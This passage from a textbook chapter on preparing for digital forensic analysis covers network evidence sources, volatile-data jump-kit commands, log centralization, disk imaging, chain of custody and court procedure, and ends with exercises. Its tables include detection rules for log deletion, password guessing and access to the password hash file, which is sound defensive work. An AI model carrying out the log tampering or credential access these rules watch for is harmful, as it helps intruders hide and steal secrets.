16.2.2 Collecting Important Information There are many things to investigate in a computer, including files, logs, configuration/registry, web accesses, network usage, software programs, memory/cache, etc. These are mainly investigated using forensic tools. However, it is also useful to know where certain information can be found outside the main computer. The network contains a lot of useful information as summarized in Fig. 16.1. Servers provide information related to application usage [3]: Authentication Service: This server provides a centralized mechanism for tracking logons to various systems and services. Its forensic value is to track successful Table 16.2  Questions for investigation: rogue wireless access point (workbook exercise) Incident Questions to investigate

Table 16.2  Questions for investigation: rogue wireless access point (workbook exercise)

Incident: Rogue Wireless Access Point (WAP)
Questions to investigate:
• When did the rogue WAP appear?
• Who connected to it?
• Who introduced it?
• How do we eliminate it?
• What information passed through the rogue WAP and may have been compromised?
• What else might the owner of the rogue WAP do?

[Figure: network diagram labeling forensic sources. Firewall: connections; network/transport-layer prohibited packets; configuration changes. WAP: MAC addresses, configurations, monitoring. Router: source IP address tracking, illegal packets, statistics, configuration changes. Authentication Server: successful/unsuccessful logons, unusual times. DHCP: translates MAC address to IP address, possibly machine name; can derive manufacturer/type. Web Proxy: web accesses, malware origination, view downloaded web pages. DNS: cache lookups track who accessed services when (e.g., email, web, ssh). Application Server: view normal events, errors and abuses via logs. Switch: translate MAC address to physical port, monitor traffic.]

Fig. 16.1  Finding Forensic Information in the Network

and unsuccessful logon attempts, with their date and times. This system can identify password guessing attacks, unusual access times, and unusual services used. It is also important to tracks configuration changes to user accounts. Application Servers: Database servers, web servers, email servers, and voicemail servers provide functionality related to their name. Their forensic use is to track normal events that happen related to those servers, as well as to report on observed errors and abuses via logs and alerts. Configuration changes are also worthy to investigate. Web Proxy: A web proxy improves network performance and response time by caching webpages. They serve to filter and log web traffic. The forensic value of web proxies is to track web surfing traffic for individual users or client IP addresses, as well as logging inappropriate accesses. This information can help to trace phishing accesses, trace sources of malware, and enable viewing of downloaded materials. Network devices can help to find the following information [3]: Domain Name Service (DNS): DNS translates hostnames to IP addresses and vice versa. For forensic purposes, DNS can track cached lookups from external sites (e.g., web, ssh, email, etc.) and provide timeframes of access for timeline analysis. Dynamic Host Configuration Protocol (DHCP): DHCP allocates IP addresses to edge nodes within local area networks. This function is generally implemented in routers, Wireless Access Points or infrastructure servers. DHCP’s forensic


value is that it may identify MAC addresses from leased IP addresses and indicate when the IP address was allocated, or when the device connected to the network. It may also provide a hostname. The identified MAC address can then identify a network card manufacturer (although MAC addresses are forgeable.) Firewall: A firewall filters packets by forwarding appropriate packets and discarding inappropriate packets (optionally with logging or alerting). For forensic purposes, when logging and alerting are enabled, this notifies administrators of incidents detected by the firewall at the protocol levels supported by the firewall (usually including the network and transport layers, and possibly up to the application layer). Firewalls should also report alerts on configuration changes and may be used to monitor network statistics. Network Intrusion Detection System: A NIDS monitors network traffic for unusual or inappropriate packet sequences potentially at all packet layers. Its forensic value is to report on unusual or inappropriate packets. They may also report on system configuration changes and enable monitoring of network statistics. There must be a balance between collecting required useful information and getting swamped with too much data. Therefore, the NIDS may be configured to collect protocol header information only. During an investigation, recordings may be extended to collect additional packet information in both scope and content, particularly focused on the attack. Switches: Switches aggregate communications from endpoints to the core network. Edge switches interface with user and other endpoints and core switches aggregate communications from multiple edge switches. The forensic uses of edge switches include identifying a physical wire from a MAC address, and monitoring transmissions to endpoint(s) by listening to a SPAN port configured for mirroring. SPAN ports enable copying of transmissions to endpoint(s) for protocol analysis. Wireless Access Points: These are wireless routers that create a wireless local area network. Wireless access points often advertise their names and capabilities. Monitoring this information can find rogue access points and ensure that bona fide access points are advertising the proper encryption algorithms and configuration. It is also possible to monitor wireless devices, by monitoring MAC addresses for validity and to monitor volumes of information sent and received. Host computers that the attacker penetrates should also be investigated: Hosts: Client and Server machines contain volatile and non-volatile (e.g., disk drive) information. Its forensic value is to learn what the attacker did while accessing the machine, e.g., through logs. Sources of information may include defensive software including antivirus, endpoint security system, and Host Intrusion Detection System software. Their capabilities may range from detecting and naming of installed malware to providing details of violations of configuration or policy. The next section on Technical Methods section describes more of how hosts can be analyzed.

296

16  Preparing for Forensic Analysis

Cameras: Cameras record actions within camera view, thus serving as a deterrent for potential criminals. Forensically they can help to track physical intruders and provide video evidence of intrusion. Internet of Things (IoT): Smaller, newer, cheaper, and/or low-power devices may be particularly vulnerable to security attacks; logs for these devices should also be monitored. What may seem an insignificant Wi-Fi controlled lightbulb may be the key attack vector or exposed surface. Figure 16.1 summarizes where important forensic information may be found, and Table 16.3 provides an example scenario. In addition to knowing where to find information, time is of the essence when gathering forensic information. Consider the following priorities in advance of an event: [3]. • Value: What information is most important? • Effort: What information is easily accessible? • Volatility: What information will disappear (e.g., in memory)? Table 16.3  Determining where to find information: rogue wireless access point (workbook exercise) Potential incident Rogue wireless access point (WAP)

Important information to obtain Currently connected terminals (to rogue WAP and true WAP) Characteristics and identity of rogue WAP

Connection time of affected terminals and rogue WAP

Location of rogue WAP

Applications used by persons during this time Person who installed rogue WAP Determine what rogue WAP accessed

Location of information Accessible Wireshark: Connect Wireshark with radio capability and monitor for current transmissions to: 1. Observe MAC addresses interfacing with rogue and true WAP; 2. Observe MAC address of rogue WAP and identify network card type; 3. Identify where signal strength to rogue WAP is strongest. DHCP: Determine which MAC addresses connected at which times, including rogue WAP (if available). WAP: Determine when MAC addresses connected and left the true WAP. Switch: Identify switch physical port and wire from rogue WAP’s MAC address to determine where rogue WAP connects. Confirm the Ethernet address and network card match as expected DNS cache indicates IP addresses recently accessed; people interviews Equipment inventory list: Assigned person Camera (if available nearby) Forensic analysis on machine running rogue WAP, to investigate or confirm what happened during timeframe in question
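As a hedged illustration of the Wireshark row above, the following Scapy sketch watches Wi-Fi beacon frames and flags BSSIDs that are not in the equipment inventory. The interface name and the inventory MAC addresses are hypothetical, and the wireless interface must already be in monitor mode.

```python
# Hedged sketch: spotting unknown Wi-Fi beacons with Scapy.
from scapy.all import sniff
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11Elt

KNOWN_APS = {"aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"}   # inventoried WAPs

def check_beacon(pkt):
    if pkt.haslayer(Dot11Beacon):
        bssid = pkt[Dot11].addr2                 # transmitter = BSSID
        ssid = pkt[Dot11Elt].info.decode(errors="replace")
        if bssid and bssid.lower() not in KNOWN_APS:
            print(f"Possible rogue WAP: SSID={ssid!r} BSSID={bssid}")

# "wlan0mon" is a hypothetical monitor-mode interface name.
sniff(iface="wlan0mon", prn=check_beacon, store=False)
```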


That leads us to the question of how to collect this high-priority information. To access this information in host and network machines, technical expertise is required.

16.3 Technical Perspective: Methods to Collect Evidence

This section describes three important methods to collect artifacts:

• Collecting volatile information: the current picture of what is happening
• Collecting and analyzing logs
• Copying and analyzing disk images

16.3.1 Collecting Volatile Information Using a Jump Kit

Since volatile information is the first information to be lost or overwritten, we look at this information first. Volatile information is caught as soon as possible when the attack is recognized, and includes the current information on active logons, open files, logged-in users, active processes, and current network connections. It is also important to copy all logs before criminals have a chance to overwrite them [8]. By the time a computer is powered down, or after minutes have passed following an incident, this information can be lost. After power down, a forensic image is taken of the disk, which can then be analyzed. Since criminals can change the operating system to hide their actions, it is important not to rely on system and forensic tools executed on the system under question. A forensic jump kit contains a USB drive with forensic software; forensic tools from this drive should be run to collect the volatile information. It is good to start and end with commands collecting the system time, to track when the forensic dump occurred. Forensic examiners travel with a jump kit, which includes a laptop preconfigured with protocol sniffers and forensic software, plus network taps, cables and sanitized drives [16]. Often, the initial part of an investigation will be to get a full memory and disk image snapshot, which includes a record of network connections, open files, and in-progress processes. Since the attacked computer may have a corrupted operating system, the jump kit provides reliable tools to obtain valid data. A jump drive enables the investigator to record volatile information reliably in a short time. The jump drive includes command script(s) to record volatile information. Volatile information should be recorded in order of volatility, and may consist of [3, 4]:

• Processor memory: Cache and registers (for routers, switches and NIDS, this includes recording the running configuration)

16  Preparing for Forensic Analysis

298

• Network state, including current network connections, the routing configuration and the ARP table
• List of running processes
• Current statistics and recent command history
• Swap file: the recent memory used by the computer for virtual memory purposes
• Date and time, for evidentiary purposes; these should be recorded as the first and last commands of the jump drive script

Kali Linux on DVD or a bootable USB drive should be part of the toolkit, in order to run commands on a secure O.S. and not rely on the potentially corrupted O.S. being investigated. A good technical source of commands to build this table is the Blue Team Handbook: Incident Response Edition, by Don Murdoch [5]. Murdoch recommends saving off volatile information in order of processor (registers, cache, memory capture, process state tables), network (routing, ARP, statistics), main memory, and file system/swap space. Table 16.4 lists some good commands for a jump drive script for a Linux/UNIX machine [4, 5]. The jump drive should be well labelled: Linux Incident Response. The jump kit should also include incident forms, notebooks, pens, a flashlight with batteries uninstalled, and the Incident Response Team call list [5]. The investigator must be careful not to taint the evidence. For example, if a cell phone is left on to retain evidence, it must be kept in a Faraday bag, which will (hopefully) shield the phone from connecting to networks [15].

Table 16.4  Jump drive script for UNIX

Command                                      Function
date                                         Display the current date and time
dd if=/dev/mem of=/evidence/case123.memory   Copy main memory (/dev/mem) to /evidence/case123.memory, or an appropriate path
hostname                                     Print the host name of this machine, applicable if the IP address is in a DNS
ls -la                                       List directories, including permissions and last modifications
uptime                                       Display how long the system has been powered up
printenv                                     Print the environment variables (e.g., command paths)
pstree -a                                    Display a tree of processes
ps -ef                                       Display statistics of all current processes
who                                          Display logged-in users
last                                         Display the history of all users logged in, and the system boot time
history                                      Display the command history (the last 500 commands)
ip                                           Display IP address, router, DNS server, with varied options
netstat                                      Display connections and active network listeners
netstat -nr                                  Display the routing table
arp -a                                       Display the ARP table
systemctl                                    Display the status of all services
date                                         Display the current date and time
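A jump-drive script along the lines of Table 16.4 can be as simple as a wrapper that runs each command and timestamps the output. The hedged Python sketch below omits the dd memory capture and the shell-builtin history for brevity; the output path is a hypothetical mount point on the examiner's media, and in practice the binaries invoked should be trusted copies carried on the jump drive itself.

```python
#!/usr/bin/env python3
# Hedged sketch of a volatile-data collection wrapper (not a court tool).
import datetime
import pathlib
import subprocess

COMMANDS = ["date", "hostname", "uptime", "printenv", "pstree -a",
            "ps -ef", "who", "last", "ip addr", "netstat -an",
            "netstat -nr", "arp -a", "systemctl", "date"]

out = pathlib.Path("/mnt/evidence/volatile.txt")   # hypothetical mount point
with out.open("w") as f:
    f.write(f"Collection started {datetime.datetime.utcnow()} UTC\n")
    for cmd in COMMANDS:
        f.write(f"\n=== {cmd} ===\n")
        result = subprocess.run(cmd.split(), capture_output=True, text=True)
        f.write(result.stdout or result.stderr)    # record errors as evidence too
```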


Photos are taken of the inside and outside of the computer, to document its full hardware configuration [15]. After an investigator photographs an active screen and records memory contents, the computer may be powered down.

16.3.2 Collecting and Analyzing Important Logs

Monitoring logs is useful on the attacked host as well as on other network devices. Logs, or events, are the messages that systems and network devices produce to report warnings or errors. It is important to ensure they are configured properly, monitored regularly, and reacted to quickly when important incidents occur. A thoughtful configuration is required to collect appropriate logs in correct ways. To counter deleted or modified logs, logs must be transferred off a device quickly after they are recorded, and should be accumulated in centralized log server(s). A centralized log server enables logs to be sorted and analyzed in one location, in order to build a timeline. To easily sort logs for analysis, log times and their originating computer clocks must be synchronized across the network. This is best achieved using two methods. First, it is best to agree on one time system across the corporate network. Correlating log times can be confusing due to different time zones, daylight saving time, and mobile or moved devices on non-local time zones; working with one standard time across a corporate network makes correlating and analyzing logs easier. The standard time zone used is Coordinated Universal Time (UTC), which started Jan 1, 1972 and corresponds to the Greenwich Mean Time zone [2]. The second helpful method to synchronize time is the Network Time Protocol (NTP), which ensures that devices in a network communicate among themselves to agree on a precise time, to a reasonable level of accuracy. Without NTP coordination, computer clocks may run slightly fast or slow, and sorted logs may appear out of logical order. It is particularly interesting to monitor the logs produced when an operating system powers up or first connects to the Internet. The power-up sequence has a set of automated start-up processes, and log(s) indicate when the boot is complete; therefore, a log of a suspicious process can be confirmed as coming from an automatic startup or as user-initiated. It is also helpful to remember that direct commands to physical devices, or any disabling of interrupts, are only permitted by the operating system (i.e., in kernel mode) and not by any application or external O.S. utility (i.e., in user mode).

Windows: Windows logs can be accessed by searching for 'Event Viewer'. Figure 16.2 shows that there are two basic categories under Event Viewer: 'Windows' and 'Applications and Services'. In general, 'Windows' relates to operating system logs, whereas 'Applications and Services' relates to optional software packages, including some Microsoft applications such as Word and Excel [2].


Fig. 16.2  Windows event viewer for logs

Windows logs can be sorted by priority when they are displayed. Priorities include [6]:

• Critical: Requires immediate attention
• Error: A problem that does not require immediate attention
• Warning: A future problem is arising
• Information: For your information

Windows log categories include the following examples [2]:

• Application: Information related to MS applications, e.g., Outlook, MS Edge
• Security: Audit information, logon/logoff, resource utilization. Policy is established through the MMC Local Security Policy, and results can be 'audit success' or 'audit failure'
• System: Operating system events, e.g., low power, system connections
• Setup: Patches applied, or failed to apply
• Forwarded: Logs forwarded from other systems are stored here

UNIX/Linux: System log capabilities include syslog, syslog-ng (next generation), rsyslogd (reliable and extended syslog) and journalctl. Syslog-ng and rsyslogd provide extra capabilities to support both TCP and UDP, use encryption, and support enhanced configurability; rsyslogd also supports IPv6 and high-precision timestamps [3]. Journalctl utilizes syslog's priorities and its next-generation utilities. The format of Linux/UNIX logs is: <date time> <hostname> <process>[Process ID]: <message>. UNIX, Linux and Mac configuration files are located in /etc. The log configuration file may be found in an /etc directory, such as /etc/syslog.conf, /etc/syslog-ng/syslog-ng.conf or /etc/systemd. The logs themselves are normally stored in files under /var/log, if not forwarded to a centralized log server. Log files are often named after <facility>.<priority>, where the facility indicates the functional category and the priority relates to the severity [2].
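Once logs are centralized, building a timeline is largely a matter of normalizing timestamps and sorting. The hedged sketch below parses the classic syslog line format described above; it assumes the traditional timestamp layout, a known year, and UTC, all of which would need checking against the actual log source.

```python
# Hedged sketch: normalize classic syslog lines into a UTC-sorted timeline.
from datetime import datetime, timezone

def parse_syslog(line, year=2023):
    """Parse '<Mon dd hh:mm:ss> <host> <msg>'; year/zone are assumptions."""
    ts = datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")
    host, _, msg = line[16:].partition(" ")
    return ts.replace(tzinfo=timezone.utc), host, msg

lines = ["Jun  1 01:02:03 dbserver sshd[811]: Failed password for root",
         "Jun  1 01:01:59 fw01 kernel: DROP IN=eth0 SRC=203.0.113.9"]
for ts, host, msg in sorted(parse_syslog(l) for l in lines):
    print(ts.isoformat(), host, msg)    # events now in timeline order
```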


Table 16.5  Important Windows logs and their sources (example)

Expanded security permissions: Windows events 4728, 4732, 4756 (member added to a security-enabled group). Notification: alert by SIEM
Password guessing: Windows event 4740 (user account locked out). Notification: alert by SIEM
Logs deleted or disabled: Windows events 1102 (log deleted), 4719 (log recording is disabled), 4902 (changes to audit policy, which can include turning off logging). Notification: alert by SIEM
Attempt to access a privileged file or directory: Windows event 4663 (attempt made to access an object). Notification: log
Access to the password hash file: Windows event 4782 (password hash account accessed). Notification: alert by SIEM
Computer account created: Windows events 4741, 4742 (computer account created or changed). Notification: alert by SIEM

Since logs may be modified by attackers to hide their tracks, it is important to forward security-related and priority logs, in particular, to a dedicated centralized log server. Table 16.5 indicates some important logs that should be of concern [4, 7]. Logs forwarded to a centralized log management system are not only protected from modification; administrators are also notified of problems. Centralized log managers enable logs to be stored, sorted and searched in a generic way. A Security Information and Event Management (SIEM) tool is a sophisticated form of centralized log manager with additional security capabilities, including a security focus, integration with more tools (including antivirus), correlation of events, issue-tracking capability, and some fine-tuning programmability.
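As a hedged illustration, a first pass over an exported Windows Security log can simply sweep for the event IDs in Table 16.5; the CSV export format and column names below are assumptions, and a real deployment would rely on the SIEM's own correlation rules instead.

```python
# Hedged sketch: sweep an exported Windows event log (CSV) for the
# high-risk event IDs from Table 16.5. CSV layout is a hypothetical export.
import csv

ALERT_IDS = {"1102": "log deleted", "4719": "auditing disabled",
             "4740": "account lockout (password guessing?)",
             "4728": "member added to security-enabled group",
             "4782": "password hash accessed"}

with open("security-events.csv", newline="") as f:      # hypothetical file
    for row in csv.DictReader(f):
        label = ALERT_IDS.get(row.get("EventID", ""))
        if label:
            print(f'{row.get("TimeCreated")} {row["EventID"]}: {label}')
```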

16.3.3 Collecting and Forensically Analyzing a Disk Image

As part of a forensic investigation, it is important to analyze disk contents. In the computer forensic field, the original data must be touched as little as possible; even the alteration of a single file access time can invalidate evidence. Therefore, forensic analysis must be done on a copy of the disk, not the original. It is recommended that two copies of any evidence be made: the first for analysis, and the second as a backup to the original [4]. Using two different imaging tools can be helpful to ensure and prove authenticity. Figure 16.3 shows how a forensic image is created. To ensure the original disk or media has not been modified, an integrity hash is calculated over the entire original disk or media. Replicas are created by copying bit-by-bit from the original, using an approved-for-court media copy tool. Upon completion, the copy should be set to write-protect (read-only) to prevent alteration [8]. When an integrity hash is calculated over the replicas, they should have the same hash value as the original. This ensures


Fig. 16.3  Creation of an identical disk image for forensic analysis

that the analysis of the media replica, admitted into court, is also accurate. Finally, access to the copy must be controlled for purposes of authenticity and chain of custody. The date and time of all forensic actions, including recording computer memory, powering down the computer, taking the integrity hash, copying the original disks, and securely storing the original disk for safekeeping, must be recorded as part of the Chain of Custody requirements [9]. Analysis of the disk should be done using a machine that has no access to the Internet, in a room with controlled physical access that is shielded from electromagnetic interference (e.g., no access to radio/Wi-Fi) [4]. Forensic tools are useful in normalizing data (converting disk data to an easily readable form). During the forensic analysis, the disk or media copy is analyzed for logs, file timestamps, file contents, and recycle bin contents. Hidden disk space can include unallocated disk space, space at the end of volumes or files (volume slack, file slack, master boot record slack), and good disk blocks marked bad and reused [4]. With forensic tools, it is possible to search for keywords throughout the disk. Example forensic toolkits include:

• EnCase: Interprets data on hard drives of various operating systems, tablets, smartphones and removable media, for use in court. (www.guidancesoftware.com)
• Forensic Tool Kit (FTK): Supports Windows, MAC, UNIX/Linux operating systems, including analysis of volatile (RAM memory and O.S. structures) and nonvolatile data, for use in court. Excellent Windows disk analysis of the Windows registry, and interpretation of popular Windows and other applications. (www.accessdata.com)


• Cellebrite: Decodes data from commercial mobile devices for use in court. Mobile devices are connected via appropriate cables to a workstation with the forensic tool installed, or via a travel kit. (www.cellebrite.com)
• OSForensics: A lower-cost, easy-to-use, nearly full-featured forensic package.
• ProDiscover: Analyzes hard disks for all Windows operating systems, as well as Linux and Solaris. An Incident Response tool can remotely evaluate a live system. The Basic version is a test version that can be downloaded for free. (www.techpathways.com)
• X-Ways: Specializes in Windows operating systems. X-Ways can evaluate a system from a USB stick without installation, and requires less memory than other forensic tools. Other products include a disk imager and a permanent disk-erasure tool. (www.x-ways.net)
• Sleuth Kit/Autopsy: This open-source tool evaluates Windows, Unix, Linux and OS X operating systems. It is programmer-extendable. The Sleuth Kit (TSK) is a command-line tool, while Autopsy provides a graphical interface. (www.sleuthkit.org)
• Redline: A free Windows collection and analysis tool that takes a snapshot of a device for investigative purposes, to find signs of malicious activity through memory and file analysis. (www.fireeye.com)
• AnaDisk Disk Analysis Tool: This tool operates on different types of disk systems (DOS, Mac, UNIX TAR) and is capable of looking into slack space and other data-hiding locations.

A Linux Live CD enables booting a suspect system from removable media (USB drive or CD) running Linux, to investigate its hard disk image. Example live CD systems include Helix and Kali Linux. In situations where forensic tools are weak, an investigator may want to load a disk image or observe how a system or application behaves. The ForensicExplorer tool (www.forensicexplorer.com) enables the loading of an image into a virtual machine in read-only mode [4]. To observe an application, the investigator may launch it on a virtual machine running identical versions of the operating system and software packages.
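Returning to the integrity-hash step described at the start of this section, below is a minimal sketch of verifying that replicas match the original media. The image paths are hypothetical, and real acquisition would use a court-qualified imaging tool with a hardware write blocker; this only illustrates the hash comparison itself.

```python
# Minimal sketch of the integrity-hash check: hash the original media and
# each replica, and confirm the values match before analysis begins.
# Paths are hypothetical; a real acquisition uses an approved copy tool.
import hashlib

def sha256_of(path: str, chunk_size: int = 1024 * 1024) -> str:
    """Stream a disk image (or raw device) through SHA-256 in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            digest.update(chunk)
    return digest.hexdigest()

original_hash = sha256_of("/evidence/original.dd")
for replica in ("/evidence/replica1.dd", "/evidence/replica2.dd"):
    assert sha256_of(replica) == original_hash, f"{replica} does not match original"
print("Integrity verified:", original_hash)
```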

16.4 Legal Perspective: Establishing Chain of Custody

The legal aspect is concerned with authentically collecting, preserving, and presenting evidence in court. For a case to succeed in court, any hacking or fraud crime must be properly handled according to law enforcement procedures. This section introduces the required precautions and court procedures. However, law enforcement or experienced forensic experts are necessary to ensure all details are correctly handled.


Authenticity of evidence is concerned with the true history of the investigation. Authenticity requires that the evidence is from the system under investigation, and that the evidence was not altered [9]. A Digital Evidence form describes a piece of evidence and where/when it was collected, stored and imaged. The evidence description includes manufacturer, model, serial number, and digital hashes [4]. A Chain of Custody form tracks who handled the evidence from minute to minute and ensures that the evidence was properly sealed and locked away with extremely limited access (Fig. 16.4). The Chain of Custody document describes when and where the evidence was held/stored, and the name, title, contact information and signature of each person who held or had access to the evidence at every point in time, and why they had access [10, 16]. It is useful to have a witness at collection points (see Fig. 16.4). Cryptographic hashes ensure that the forensic artifacts are not modified [2]. Evidence is stored in evidence bags, sealed with evidence tape, and stored in locked cabinets in a secured room. Eventually the time spent and hourly rates must be totaled for internal metrics and legal justification.

When the case is brought to court, the disk copy tool and forensic analysis tools must be standard and qualified for court. Also, the investigator's qualifications, including education level and forensic training, will be subject to scrutiny [15]. Forensic examiners should be certified, either through forensic software vendors (e.g., EnCase, FTK) or through independent organizations (sample certifications: Certified Computer Forensics Examiner, Certified Forensic Computer Examiner). Some states require a private detective license.

The Investigation Report will need to describe the details of the incident accurately. It will need to provide descriptive details of all evidence and forensic tools used in the investigation. All evidence must be easily referenced and provided in full detail, including interview information and communications. Actual data should be provided for forensic analysis results. The report should fully describe how any conclusions were reached, in an unambiguous and understandable way. The report shall also include the investigator's contact information and the dates of the investigation, and must be signed by the investigator [11, 12].
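As an illustration only, the following sketch shows the kind of bookkeeping a Digital Evidence form and Chain of Custody form capture. The field names mirror the description above; they are not an official court template, and the sample values are hypothetical.

```python
# Hedged sketch of Digital Evidence / Chain of Custody record-keeping.
# Field names follow the description in the text, not any official form.
from dataclasses import dataclass, field
from datetime import datetime, timezone

@dataclass
class CustodyEvent:
    handler_name: str
    handler_title: str
    contact: str
    action: str            # e.g., "collected", "imaged", "stored", "transferred"
    location: str
    reason: str            # why this person had access
    witness: str | None = None
    timestamp: datetime = field(default_factory=lambda: datetime.now(timezone.utc))

@dataclass
class EvidenceItem:
    description: str       # manufacturer, model, serial number
    sha256: str            # integrity hash of the media
    custody_log: list[CustodyEvent] = field(default_factory=list)

item = EvidenceItem(description="WD 2TB HDD, s/n WX123 (hypothetical)",
                    sha256="(hash of the original media)")
item.custody_log.append(CustodyEvent(
    handler_name="A. Investigator", handler_title="Forensic Examiner",
    contact="ainv@example.org", action="collected",
    location="Server room B12", reason="Incident #2024-07", witness="J. Smith"))
```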

Fig. 16.4  Chain of custody timeline


16.5 Advanced: The Judicial Procedure

The Investigation. If an investigation is initiated by law enforcement, which is investigating an organization or home, a search warrant is required unless the organization/home gives permission; the crime is communicated to a third party; the evidence is in plain sight or is in danger of being destroyed; evidence is found during a normal arrest process; or police are in hot pursuit [15]. Computer searches generally require a warrant, except when a signed acceptable use policy grants permission. Also, if a computer is submitted for repairs, the repair person may notice illegal activities, such as child pornography, during their normal repair functions [10]. In this case, they can report the computer to law enforcement.

The judicial proceedings begin for a civil case when a Complaint (or lawsuit) is filed, and for a criminal case when someone is arrested. For a civil case, the defendant must send an Answer within 20 days [15]. In the United States, when a suspect is going to be questioned about a crime, the Miranda rights must be read: "You have a right to remain silent…" In some states, a prosecutor then files an Information, detailing the criminal charges. Alternatively, a grand jury issues an indictment if they determine that the alleged charge should proceed.

Discovery. During Discovery, the plaintiff, who initiated the lawsuit, and the defendant provide their lists of witnesses and evidence to the other side. Each side may then request testimony, files and documents from the other to determine legal claims or defenses [13]. Such documents are called Responsive documents and can take the form of electronically stored information (ESI). The U.S. Federal Rules of Civil Procedure define how ESI should be requested and formatted. E-discovery (or ESI) requests can be general or specific, such as a specific document or a set of emails referencing a particular topic.

Depositions are interviews of the key parties, such as witnesses or consultants [17]. A deposition consists of a question-and-answer session, where all statements are recorded by a court reporter and possibly via video. The deponent, or person who answered questions during the deposition, may correct the transcript before it is entered into the court record.

Evidence admissible to a court includes reports or testimony. Witnesses can be fact witnesses, expert consultants, or expert witnesses [13]. Fact witnesses report only on their participation related to the case, generally in obtaining and analyzing evidence. When providing testimony, they must present their qualifications. Email correspondence with lawyers is given attorney-client privilege and cannot be requested during discovery. However, notes, reports, and chain of custody documents are discoverable. Expert consultants help lawyers understand technical details, but do not testify or give depositions. Expert witnesses are the most qualified, with extensive experience [13]. Computer forensic examiners often serve in this role. They provide expert opinions within reports and/or testimony at both depositions and trials. They do not need to have first-hand knowledge of the case, but can interpret evidence obtained by others. Expert witness testimony must be carefully given, because if experts contradict themselves, the judge may order the jury to ignore the testimony. That mistake can then be brought into question in future cases, and thus can ruin the expert's reputation.

Declarations are written documents, where the declarer publicly states their findings and conclusions [17]. Their name, title, employer, qualifications, and often billing rate are all documented in the declaration. The case is identified, the declarer's role and position are clarified, and the declarer signs the document. An affidavit is similar in outline to a declaration, but stronger, since an affidavit is signed before a notary. Both declarations and affidavits are limited in breadth to supporting motions. An expert report can provide opinions, but should do so extremely carefully, since every word may be challenged by expert witnesses on the other side [17]. All court reports become public documents unless they are specifically sealed. Any public document can be challenged in the current – as well as future – cases; thus, a witness must be very confident in anything they write in such a report. Providing full references to public documents helps to defend your position and bolster your claims. Discovery usually ends 1 to 2 months before the trial, or upon agreement by both sides.

The Trial. The four stages of a typical trial are opening arguments, the plaintiff's case, the defendant's case, and closing arguments. In the United States and the United Kingdom [14], case law is determined by regulation, but also by precedent: when regulation is not explicit and must be interpreted, decisions in previous cases hold weight. To obtain a conviction in a criminal case in the U.S. and U.K., the burden of proof must be "beyond a reasonable doubt" that the defendant committed the crime [14]. In a civil case, the U.K. burden of proof is "the balance of probabilities" or "more sure than not".

16.6 Questions and Problems

1. Vocabulary. Match each meaning with the vocabulary:

NTP, SIEM, Volatile, Authenticity, Jump kit, Centralized log server, Chain of custody

(a) The legal process of protecting evidence, by documenting all actions, working with a witness, and by not altering the evidence.
(b) A protocol that ensures that devices in a network have their time synchronized.
(c) Information that is erased upon power down.
(d) A reliable technique to collect volatile information from a device.


(e) A system that collects logs from a set of devices to prevent log modification.
(f) A centralized log collection system that analyzes and summarizes log history.
(g) Analyzed evidence must perfectly match the original evidence.

2. Finding important information. Where can the following information be found?

Switch, Web proxy, NIDS, Router, Firewall, Camera, Application server, Domain name server, Wireless access point, Authentication server, Dynamic host configuration protocol

(a) Translates a MAC address to a physical wire.
(b) Translates an IP address to a MAC address.
(c) Caches the email, web and other sites visited by a user or IP address.
(d) Lists when a user logged into different services or devices.
(e) Describes the websites a user visited and their responses.
(f) Indicates errors encountered by specific applications.
(g) Tracks people who physically entered an area.
(h) Can detect network scanning (multiple answers).

3. High-level Forensic Analysis. Complete the two tables, Table 16.2: Question for Investigation and Table 16.3: Determining where to find information, for the following incidents:

(a) User permission is advanced to system administration level.
(b) The database reports a tripling of data access in 1 day.

4. Discovering important logs. Consider the following scenarios. What logs or alerts might help, and where might you find them? (Fig. 13.2 may help.)

(a) SQL attack
(b) Phishing attack leads to network mapping and password guessing attacks
(c) A worm in the network
(d) Ransomware is being installed

5. Locating important logs. Look in your operating system to find your logs. Find 5 logs that you think should be forwarded to a centralized log server. Discuss where you found the logs, including the given log category and priority. Indicate why you think they are important to forward from a forensic perspective.

6. Forensic Tool Evaluation. Select a forensic tool to evaluate. What capabilities does this forensic tool have? What devices or operating systems does it analyze? How much does it cost? Can it be used legally? Write a description of this tool.


References

1. Conger K, Frenkel S (2021) Thousands of Microsoft customers may have been victims of hack tied to China. NY Times, 7 March 2021
2. Messier R (2017) Network forensics. Wiley, Indianapolis
3. Davidoff S, Ham J (2012) Network forensics: tracking hackers through cyberspace. Pearson Education, Upper Saddle River
4. Easttom C (2019) System forensics, investigation, and response, 3rd edn. Jones & Bartlett Learning, Burlington
5. Murdoch D (2014) Blue team handbook: incident response edition, version 2.0. Don Murdoch
6. Microsoft (2016) Trace and event log severity levels, 10/20/2016. https://docs.microsoft.com/en-us/previous-versions/office/developer/sharepoint-2010/ff604025(v=office.14)
7. ManageEngine (n.d.) The 8 most critical Windows security event IDs. https://download.manageengine.com/products/active-directory-audit/kb/the-eight-most-critical-windows-event-ids.pdf. Accessed 13 July 2021
8. Jarrett HM, Bailie MW, Hagen E, Eltringham S (ed) (n.d.) Prosecuting computer crimes. Office of Legal Education, Computer Crime and Intellectual Property Section, Criminal Division. https://www.justice.gov/criminal/file/442156/download
9. Ali KM (2012) Digital forensics: best practices and managerial implications. In: 2012 fourth international conf. on computational intelligence, communication systems and networks, IEEE Computer Society, http://ieeexplore.ieee.org, pp 196–199
10. Brown CLT (2006) Computer evidence: collection & preservation. Charles River Media, Newton Centre, MA, pp 16–17, 28
11. ISACA (2019) CISA review manual, 27th edn. ISACA, Arlington Heights, IL
12. ISACA (2015) CISM review manual, 15th edn. ISACA, Arlington Heights, IL
13. Cowen D (2013) Computer forensics: InfoSec pro guide. McGraw-Hill, New York, NY, pp 257–282
14. Giles S (2012) Managing fraud risk: a practical guide for directors and managers. Wiley, Chichester, West Sussex, England, pp 255–293
15. Grama JL (2015) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington, MA, pp 461–488
16. Cichonski P, Millar T, Grance T, Scarfone K (2012) NIST special publication 800-61 rev 2: computer security incident handling guide. National Institute of Standards and Technology, Gaithersburg, MD, August 2012
17. Philipp A, Cowen D, Davis C (2010) Hacking Exposed™ computer forensics, 2nd edn. McGraw-Hill, New York, pp 341–368

Part V

Complying with National Regulations and Ethics

